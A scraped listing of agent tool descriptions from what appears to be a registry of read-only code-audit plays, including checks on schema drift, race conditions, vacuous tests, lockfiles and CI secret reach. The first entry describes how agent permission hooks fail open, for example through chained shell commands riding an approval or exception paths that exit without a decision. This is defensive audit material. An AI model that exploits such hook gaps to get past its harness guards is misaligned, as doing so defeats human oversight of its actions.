it does instead. This reconciles three answers for every guard configured on a machine, and the gap between them IS the finding. WHAT IT DECLARES: PreToolUse and PostToolUse hooks with their matchers and timeouts, across Claude Code user, local, project and enterprise settings and every installed plugin's own hooks.json, plus permissions allow/deny/ask rules and the readable approval keys in a Codex config.toml. WHAT IT CAN ACTUALLY DO, read out of the hook script's own SOURCE: does it ever emit deny, only ask, only allow, or nothing at all; does an exception path exit 0 without deciding and so fail OPEN; is the deny it does contain sitting behind a flag the configured command never passes; does its matcher regex match any tool name the harness dispatches. WHAT IT ACTUALLY DID: session transcripts record every hook firing structurally - the command, the event, the exit code, the duration and the decision - so each guard is counted against what it decided. Ranked by cost. CRITICAL is reserved for a guard that PERMITS what it exists to forbid: an exception path that exits 0 without a decision, because a PreToolUse hook that prints nothing and exits 0 is indistinguishable from one that approved; an allow-emitting hook that classifies only the leading words of a shell command, so anything chained after a separator rides the approval; and a guard that never fired while the tools its matcher names were being called. HIGH covers ask-in-an-unattended-context, which is the case this play was built from: a hook that can only ask is usually deliberate, but a SUBAGENT cannot answer a prompt, so on that surface an ask is a silent DENY and the author probably did not intend it - reported as an INTENT GAP, not as a broken guard. Also HIGH: a deny rule shadowed by a broader allow, and a deny path unreachable as configured. MEDIUM covers a dead matcher, a missing interpreter, no timeout on a blocking hook, and a hook measured slow enough to stall every call it matches. Excluded with reasons and counted rather than dropped: guards that fired and denied as designed, async notification hooks that make no decision by design, and hooks on events that cannot carry a decision at all. A fourth stage re-opens the exact source line and the exact transcript evidence behind every critical and high candidate and returns CONFIRMED, WITHDRAWN or UNCERTAIN quoting what it read, so a guard that looks never-fired only because every transcript predates its installation is withdrawn with that as the reason. EXECUTES NOTHING, TRIGGERS NOTHING. It never runs a hook, never runs a harness CLI, never runs a --help, and above all never tests a guard by attempting the action the guard forbids - deliberately tripping a permission guard to see what it does would be an agent probing its own restraints. Behaviour is determined by reading source and transcripts, which is why the report states plainly that it cannot prove any guard blocks. Credentials are reduced by construction: every env map, header and argv becomes NAMES before it enters a record, transcript message content is never opened, and the join between a configured hook and its firings is a hash of the command rather than the command itself.ROTE3 STEPSREAD ONLY0 ↓667Run ReadinessBefore you waste 20 minutes trying to run a project, reports exactly what is missing. Checks the declared runtime and its version pin, the configuration a project declares versus what is actually available, and any local services it declares, then reports every requirement with the evidence that produced it and a HIGH/MEDIUM/UNKNOWN confidence. Strictly read-only: it never modifies the project, installs nothing, contacts no external service, and reads configuration for variable names only so secret values are never exposed.ROTE4 STEPSREAD ONLY0 ↓668Sentiment ClassifierClassifies text comments by sentiment (positive/negative/neutral) and generates a summary with counts, percentages, and overall trend.ROTE1 STEPSREAD ONLY0 ↓669Github Unlabeled Unassigned IssuesLists open GitHub issues in owner/repo that have no labels, no assignee, and have been open longer than N days (default 14), oldest first.APISESSIONSGITHUB3 STEPSREAD ONLY0 ↓670Secret Blast RadiusAnswers one question about your CI, and it is not whether an outsider can get in: given the secrets a workflow already declares, how far does each one actually reach inside your own run? Where ci-supply-chain asks whether an outside contributor can reach your secrets and workflow-injection asks whether untrusted text can become a command, this reads the reach of a secret you deliberately gave your own CI, because a CI secret is scoped by whoever wrote the YAML and the usual scope is everything. For every secret name a workflow mentions it reports the real reach - which jobs, how many steps, and which third-party actions can read it - and that per-secret reach table, not a list of rule hits, is the output. Ranked by reach rather than by rule: a secret sitting in the environment of a step that runs npm install, pip install, go mod download or npx is CRITICAL, because every postinstall and build backend in the tree is arbitrary code from hundreds of authors and it runs with that environment; a secret readable by a third-party action pinned to a movable tag is CRITICAL, because its maintainer can change what it does after you approved it; `secrets: inherit` on a reusable-workflow call is CRITICAL when the callee is another repository at a movable ref, because it hands over the whole set rather than the ones the callee needs; a top-level `env:` is HIGH, since every step of every job in the file holds it; a job with no `permissions:` block or with `write-all` is HIGH, because the GITHUB_TOKEN is a credential too and its blast radius is whatever that block grants; a shell `set -x` or a debug flag in scope is HIGH; and a secret declared for every job that most of them never reference is MEDIUM. Four things are excluded and said out loud rather than quietly counted: a secret written into the env of exactly the step that uses it, which is the correct pattern; an action pinned to a full commit SHA, which is still a risk if you never review the pin but a categorically different one, so it is reported as context; `permissions: read-all` or any explicit permissions block; and a workflow that declares no secret at all, which is reported as not applicable rather than as clean. Every CRITICAL and HIGH candidate is then re-opened by a separate verify stage that re-parses the file from scratch, re-lexes the cited run body comment- and heredoc-aware, re-derives the scope structurally, and emits CONFIRMED, WITHDRAWN or UNCERTAIN quoting the text it read; withdrawn candidates are printed rather than dropped, so a correction is visible. This play NEVER reads a secret VALUE - a value lives in GitHub, not in these files - never contacts GitHub, and makes no network call at all. It reports secret NAMES and reach, from static YAML on disk, read-only.ROTE3 STEPSREAD ONLY0 ↓671Vacuous TestsA green suite is only worth what its assertions are worth. This answers one question about a repo: which tests pass without proving anything. It is the third member of a family and differs from the other two in exactly one way: skipped-tests inventories the tests that do not run and flaky-signals finds the tests that run unreliably, while this one finds the tests that DO run, reliably, and prove nothing. Seven rules, ranked by how much false confidence each one buys rather than by how easy it was to match. A test with no assertion at all is CRITICAL when its siblings in the same file all assert, because somebody believed that path was covered, and HIGH when they do not. A tautological assertion is HIGH: assert True, assertTrue(1), expect(x).toBe(x), assert result == result, assert_eq!(got, got), assert.Equal(t, got, got) -- the truth of the assertion is fixed before the code under test runs. A snapshot test with no committed snapshot is HIGH, because the runner WRITES the expectation on the first run and therefore cannot fail it. An assertion that only runs inside a loop is HIGH when the collection is built by the code under test and MEDIUM when it is a literal, because on an empty collection nothing is asserted and returning nothing is the bug that test would most want to catch. An unawaited .rejects/.resolves assertion is HIGH: the test settles before the assertion does, so a rejection reports as a pass. A catch-everything exception test is MEDIUM -- pytest.raises(Exception) with no match=, expect(fn).toThrow() with no matcher, assert.Error(t, err) with no type check, EXPECT_ANY_THROW -- because it passes on the wrong error too. An assertion on a mock rather than on behaviour is MEDIUM and graded low confidence on purpose, because for a unit whose contract IS the outbound call it is exactly right. Precision is the product, so five decoys are recognised by name, counted and excluded rather than reported: a smoke or import test that says so in its name or in the comment directly above it, an assertion delegated to a shared helper or a fixture, a parametrised test whose expectations live in the decorator, a property-based test, and a type-level assertion the compiler checks. Comment bodies and string contents are masked before any construct rule runs. Then a fourth stage re-opens every CRITICAL and HIGH candidate independently, resolves the call graph TRANSITIVELY where the analyzer resolved one level, and returns CONFIRMED, WITHDRAWN or UNCERTAIN quoting the line it read -- so a test whose assertion lives two helpers away is taken back rather than shipped. Covers Python, JavaScript, TypeScript, Go, Rust, C++ and Java-ish sources. The nearest thing in the registry is rajdeepkushwaha/test-theater, which is Python-only, has no verification stage, and does not model mocks, snapshots, vacuous loops, bare exception catches or floating async assertions. NEVER runs the suite: running a stranger's tests would execute arbitrary code, so only open() and ast.parse() ever touch the files. Read-only, offline, no network, no credentials.ROTE3 STEPSREAD ONLY0 ↓672Schema DriftAnswers one question about a codebase: where do the ORM model and the migration history disagree about the same table? They are two descriptions of one schema, written by different people at different times, and they drift. The application then queries a column the database does not have - a run-time error on the query path, not at startup, so a test suite that mocks the database never sees it - or the database carries a column nothing reads. Both directions are reported. Seven tiers are separated because they break in seven different ways: a model field no migration ever creates, which is a live query error; a NOT NULL the model thinks is nullable, which fails on INSERT rather than SELECT and is the most common production surprise; a type disagreement, model integer against migration text; a length disagreement, a string field with no length against a varchar(n); a unique=True or @@unique with no matching unique index, which means the invariant is enforced by application code alone and two concurrent writers break it; a foreign key on one side and no constraint on the other, in both directions; an orphan column no model or query reads, usually harmless and occasionally a forgotten PII column still holding data; and two migrations that both create or both drop the same column, which is what a badly resolved merge looks like. Migrations are read IN ORDER and folded into one expected schema, using the Alembic revision graph where it is intact, because a column added in 003 and dropped in 007 is not in the database and a reader that takes each migration in isolation reports it as present. An ADD COLUMN IF NOT EXISTS is idempotent by design and is never called a bad merge. Covers SQLAlchemy (classic Column and 2.0 mapped_column) with Alembic, Django models with Django migrations, Prisma schema with its migration SQL, Drizzle, GORM struct tags, and raw SQL migration directories - Flyway, golang-migrate, node-pg-migrate, plain numbered .sql. Python is parsed with ast and only upgrade() is folded, so a downgrade() never cancels the migration above it; SQL has its comments, string bodies and dollar-quoted blocks blanked before any statement is read. Five things are excluded, counted and named rather than reported: a model marked unmanaged or backed by a view, a @property or relationship() or Prisma relation field that is not persisted, a column added and then dropped across the history, a table the migrations never claim to own, and every test or fixture tree. Every critical and high candidate is then RE-OPENED by a separate verification pass that reads the exact model line and the exact migration line again, folds the history again, and returns CONFIRMED, WITHDRAWN or UNCERTAIN quoting the line it read - a NOT NULL mismatch on a column that turns out to carry a DEFAULT is withdrawn, and a column the fold cannot see but whose name appears in unparsed migration text is called uncertain rather than critical. NEVER CONNECTS TO A DATABASE: no connection string is read, no query is issued, no credential is touched. This is static reading of files, so the real schema may differ from both of them. Read-only, offline, no credentials.ROTE3 STEPSREAD ONLY0 ↓673Read Modify WriteAnswers one question about a codebase: where does it lose a concurrent update? Read a value, change it in application code, write it back - two requests do that at once and one update vanishes. It passes every single-threaded test and every load test that does not check the final number, so it survives review and arrives in production as money that does not add up. Six tiers are separated because they are six different conversations: a SELECT then an UPDATE of the same row with the new value computed in the language, whose fix is to move the arithmetic into SQL as UPDATE t SET balance = balance - $1; a get-then-set on a cache or KV store, where INCRBY, SETNX or a Lua script is the atomic form; a check-then-act on existence (`if not exists: create`) which double-creates under concurrency and whose fix is a unique constraint plus an upsert or INSERT ... ON CONFLICT; a counter incremented in application code (row.count += 1; save()) rather than in the database; a file read-modify-write with no lock, and specifically open(path, "w") then write, which truncates before the new content is committed so a crash or a concurrent reader sees an empty file, where the safe form is a temp file plus os.replace; and an await sitting between a read and its dependent write in JS/TS, which yields to the event loop and lets another request interleave even with one thread and no locks - that last one surprises people, so it is reported on its own and explained. Severity is what is LOST, not how the code looks: money, credits, inventory or any balance is critical; a lost counter or a double-created row is high; a truncated local file is high when the file is data and medium when it is a cache; a race in a script that only ever runs once is low; and a pair whose subject cannot be named is undetermined rather than guessed at. Every finding names the real line of the READ and the real line of the WRITE, so a reader can see the window between them and judge it without trusting the tool. Ten correct patterns are recognised, counted, named in the output and never reported: a read that takes a row lock with FOR UPDATE; a pair inside a transaction whose isolation level is visibly REPEATABLE READ or SERIALIZABLE - a BARE transaction is not enough and is still reported, because at READ COMMITTED a transaction does not prevent a lost update at all; an advisory lock, mutex, file lock or Redis lock held across both halves; an optimistic version, etag or rowversion check on the write; INSERT ... ON CONFLICT, ON DUPLICATE KEY, MERGE or an ORM upsert; INCR/DECR/HINCRBY/SETNX or a Lua script; a temp file plus os.replace; a migration or a worker whose concurrency is visibly one; a write that stores a constant, so repeating it is harmless; and an atomic SQL expression, where the old value is referenced on the RIGHT-HAND SIDE of the SET clause so the database does the arithmetic - SET balance = balance - $1, count = count + 1, GREATEST(balance - $1, 0), Django F(), Prisma {decrement}, gorm.Expr, Sequelize .increment(). That last exclusion only LOOKS like a read because the column name appears twice, it is exactly the fix this play recommends, and it is the single most likely false positive for a scan of this shape, so it is tested explicitly and counted separately. Comments and string bodies are blanked by a language-aware lexer, so a commented-out UPDATE stays a comment, while SQL is still read out of the string literals it lives in. Languages modelled: Python, JavaScript, TypeScript, Go, Java and Kotlin. Read-only, offline, no credentials.ROTE2 STEPSREAD ONLY0 ↓674Lockfile IntegrityAnswers one question about the file that actually decides what code lands on your machine and in CI: does this lockfile fetch anything from somewhere you did not intend? Reads package-lock.json, npm-shrinkwrap.json, yarn.lock (classic and berry), pnpm-lock.yaml, poetry.lock, Cargo.lock and go.sum where they exist, resolves every pinned entry back to its source, and reports five things that change what gets installed: a resolved URL on http:// instead of https://, a credential embedded in a resolved URL, code fetched from a host that is not a package registry at all (a raw git tarball, an object-store bucket), a git dependency pinned to a branch or a tag rather than a full commit SHA, an entry with no integrity or checksum field, and a dependency declared in the manifest with no lockfile entry, which means the next install resolves it freshly. Ranked by what actually costs you: plaintext transport and an embedded credential are critical, a foreign host or a mutable ref is high, drift is medium. A private registry the team chose is NOT a finding: it is reported as context and said to be context, because calling a deliberate mirror a breach teaches people to ignore the report. A credential that is found is never printed; the host is named and the value is withheld. Every run ends with what the play could not verify, so a clean result is not over-trusted. Offline, read-only, no network call, no credentials read.ROTE2 STEPSREAD ONLY0 ↓675Ghost RouteFind remaining code, issue, pull request, test, and documentation references to an API, feature, configuration key, command, or concept being removed.SESSIONS1 STEPSREAD ONLY0 ↓676Signal FireConnect production symptoms to recent GitHub engineering changes using evidence, timing, and changed files.SESSIONS1 STEPSREAD ONLY0 ↓677Bugbay Runtime RecoveryRuns BugBay autonomous runtime recovery with diagnosis, bounded repair, verification, rollback, and evidence.ROTE1 STEPSREAD ONLY0 ↓678Api Drift DetectorCross-source API contract drift detection, comparing OpenAPI specs, source implementations, README documentation, and tests to find contradictions. Deterministic, read-only, local-only; no network, credentials, or LLM.ROTE1 STEPSREAD ONLY0 ↓679Npm Upgrade Readiness RadarGiven a project's package.json (and optionally its package-lock.json), resolves each direct npm dependency against the live registry, classifies its upgrade status with real semver logic (already current / within declared range / manifest update needed / major migration needed), and for the top major-migration candidates best-effort scans GitHub release notes for breaking-change signals. Produces a staged, cited upgrade plan. Read-only, no credentials.ROTE2 STEPSREAD ONLY0 ↓680DivergenceUniversal Timesheet & Activity Synthesizer. Groups arbitrary evidence (git commits, GitHub PRs, issues, reviews, command logs) into a structured daily timesheet across any requested date range. Zero external dependencies; needs only python3 and sh.ROTE1 STEPSREAD ONLY0 ↓681TraceupFinds the first Git commit that makes your test fail without changing your working copy.APISESSIONSGITHUB6 STEPSREAD ONLY0 ↓